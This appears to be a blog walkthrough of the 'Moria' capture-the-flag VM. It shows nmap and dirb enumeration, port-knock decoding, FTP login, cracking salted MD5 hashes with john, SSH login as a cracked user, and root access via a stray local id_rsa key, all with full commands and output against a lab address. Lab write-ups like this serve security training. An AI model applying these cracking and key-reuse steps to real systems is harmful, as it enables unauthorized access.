Moria Walkthrough

In this post, I will show you the walkthrough of Moria, the author is abatchy.

attack machine: 192.168.56.102  
target machine: 192.168.56.105  

Use Nmap check ports and services:

Nmap scan report for 192.168.56.105  
Host is up (0.00038s latency).  
Not shown: 997 closed ports  
PORT   STATE SERVICE  
21/tcp open  ftp  
22/tcp open  ssh  
80/tcp open  http  
MAC Address: 08:00:27:1A:73:01 (Oracle VirtualBox virtual NIC)  

try port 80:
find page with image:
moria well, use dirb check more

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.56.105/ ----
+ http://192.168.56.105/cgi-bin/ (CODE:403|SIZE:210)                                                                
--> Testing: http://192.168.56.105/secci                                                                             ==> DIRECTORY: http://192.168.56.105/w/                                                                             

---- Entering directory: http://192.168.56.105/w/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

go through the directory w, I found URL /w/h/i/s/p/e/r/the_abyss/
and each time I refresh the page, they gave me some information:

root@evilc:/home/moria# cat web_message  
"Knock knock" 
Balin: "Be quiet, the Balrog will hear you!"  
"Is this the end?" 
Maeglin:"The Balrog is not around, hurry!"  
Telchar to Thrain:"That human is slow, don't give up yet"  
Oin:"Stop knocking!"  
Dain:"Is that human deaf? Why is it not listening?"  
"Eru! Save us!" 
"Too loud!" 
Nain:"Will the human get the message?"  
Ori:"Will anyone hear us?"  

I got a list of username may be useful for ssh and FTP, the more interesting thing is the knocking thing, remind me of port knocking.
So I use wireshark:
wireshark get some port number: 77, 101, 108, 108, 111, 110, 54, 57. use python check it:

root@evilc:/home/moria# python  
Python 2.7.11 (default, Dec  9 2015, 00:29:25)  
[GCC 5.3.1 20151205] on linux2
Type "help", "copyright", "credits" or "license" for more information.  
>>> for port in (77, 101,108,108,111,110,54,57):print(chr(port));
... 
M  
e  
l  
l  
o  
n  
6  
9  
>>> 

What is Mellon69? A password or username, I google the image that I found at port 80, got a answer here. Well, if the Mellon69 is passowrd, then I need to see the username.

try ftp get a username Balrog:

root@evilc:/home/moria# ftp 192.168.56.105  
Connected to 192.168.56.105.  
220 Welcome Balrog!  
Name (192.168.56.105:evilc): Balrog  
331 Please specify the password.  
Password:  
230 Login successful.  
Remote system type is UNIX.  
Using binary mode to transfer files.  
ftp>  

check the /var/www/html directory:

ftp> cd /var/www/html  
250 Directory successfully changed.  
ftp> ls  
200 PORT command successful. Consider using PASV.  
150 Here comes the directory listing.  
drwxr-xr-x    2 0        0              23 Mar 12 20:38 QlVraKW4fbIkXau9zkAPNGzviT3UKntl  
-r--------    1 48       48             85 Mar 12 19:55 index.php
-r--------    1 48       48         161595 Mar 11 23:12 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12 04:50 w  
226 Directory send OK.  
ftp>  

find a hidden URL with a index.php, check it

Prisoner's name   Passkey  
Balin   c2d8960157fc8540f6d5d66594e165e0  
Oin    727a279d913fba677c490102b135e51e  
Ori    8c3c3152a5c64ffb683d78efc3520114  
Maeglin    6ba94d6322f53f30aca4f34960203703  
Fundin    c789ec9fae1cd07adfc02930a39486a1  
Nain    fec21f5c7dcf8e5e54537cfda92df5fe  
Dain    6a113db1fd25c5501ec3a5936d817c29  
Thrain    7db5040c351237e8332bfbba757a1019  
Telchar    dd272382909a4f51163c77da6356cc6f  

check the source page:

<!--

6MAp84  
bQkChe  
HnqeN4  
e5ad5s  
g9Wxv7  
HCCsxP  
cC5nTr  
h8spZR  
tb9AWe

MD5(MD5(Password).Salt)

-->

check john find a format to crack this hash format, find dynamic_6 here.
so modify the password.txt to username:password$salt

root@evilc:/home/moria# cat prisoner.txt  
Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84  
Oin:727a279d913fba677c490102b135e51e$bQkChe  
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4  
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s  
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7  
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP  
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr  
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR  
Telchar:dd272382909a4f51163c77da6356cc6f$b9AWe  
root@evilc:/home/moria# john --format=dynamic_6 prisoner.txt  

get a list of usr/pass pairs:

Nain:warrior  
Dain:abcdef  
Telchar:magic  
Oin:rainbow  
Ori:spanky  
Maeglin:fuckoff  
Thrain:darkness  
Fundin:hunter2  

Try one by one for ssh, the Ori successed.

root@evilc:/home/moria# ssh Ori@192.168.56.105  
The authenticity of host '192.168.56.105 (192.168.56.105)' can't be established.  
ECDSA key fingerprint is SHA256:f36EkYTzFZo1NijPX18gGR4AfGFsDN2QJm6FwfGIjxs.  
Are you sure you want to continue connecting (yes/no)? yes  
Warning: Permanently added '192.168.56.105' (ECDSA) to the list of known hosts.  
Ori@192.168.56.105's password:  
Last login: Sun Mar 12 22:57:09 2017  
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)  
-bash-4.2$ ls
poem.txt  
-bash-4.2$ cat poem.txt
Ho! Ho! Ho! to the bottle I go  
To heal my heart and drown my woe.  
Rain may fall and wind may blow,  
And many miles be still to go,  
But under a tall tree I will lie,  
And let the clouds go sailing by. 

PS: Moria will not fall!  
-bash-4.2$  

Well, check more, find a .ssh directory

-bash-4.2$ ls -la
total 8  
drwx------  3 Ori  notBalrog  55 Mar 12 22:57 .  
drwxr-x---. 4 root notBalrog  32 Mar 14 00:36 ..  
-rw-------  1 Ori  notBalrog   1 Mar 14 00:12 .bash_history
-rw-r--r--  1 root root      225 Mar 13 23:53 poem.txt
drwx------  2 Ori  notBalrog  57 Mar 12 22:57 .ssh  
-bash-4.2$ cd .ssh
-bash-4.2$ ls -la
total 12  
drwx------ 2 Ori notBalrog   57 Mar 12 22:57 .  
drwx------ 3 Ori notBalrog   55 Mar 12 22:57 ..  
-rw------- 1 Ori notBalrog 1679 Mar 12 21:13 id_rsa
-rw-r--r-- 1 Ori notBalrog  392 Mar 12 21:13 id_rsa.pub
-rw-r--r-- 1 Ori notBalrog  171 Mar 12 22:57 known_hosts
-bash-4.2$ cat known_hosts 
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=  
-bash-4.2$ 

So...there is a localhost ssh connection with id_rsa file.

try it:

-bash-4.2$ ssh root@127.0.0.1 -i id_rsa
Last login: Fri Apr 28 18:01:27 2017  
[root@Moria ~]# 

get flag:

[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)  
[root@Moria ~]# cd /root
[root@Moria ~]# ls
0  anaconda-ks.cfg  Desktop  flag.txt  hosts  
[root@Moria ~]# cat flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;  
The old that is strong does not wither,  
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,  
A light from the shadows shall spring;  
Renewed shall be blade that was broken,  
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?  
-Abatchy

[root@Moria ~]# 

Done amazing.